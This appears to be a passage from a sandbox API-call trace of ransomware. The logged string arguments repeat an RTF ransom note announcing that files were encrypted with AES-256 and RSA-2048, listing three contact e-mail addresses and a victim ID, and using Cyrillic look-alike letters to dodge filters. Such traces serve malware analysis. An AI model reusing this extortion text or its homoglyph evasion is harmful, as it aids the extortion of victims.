fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.597] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 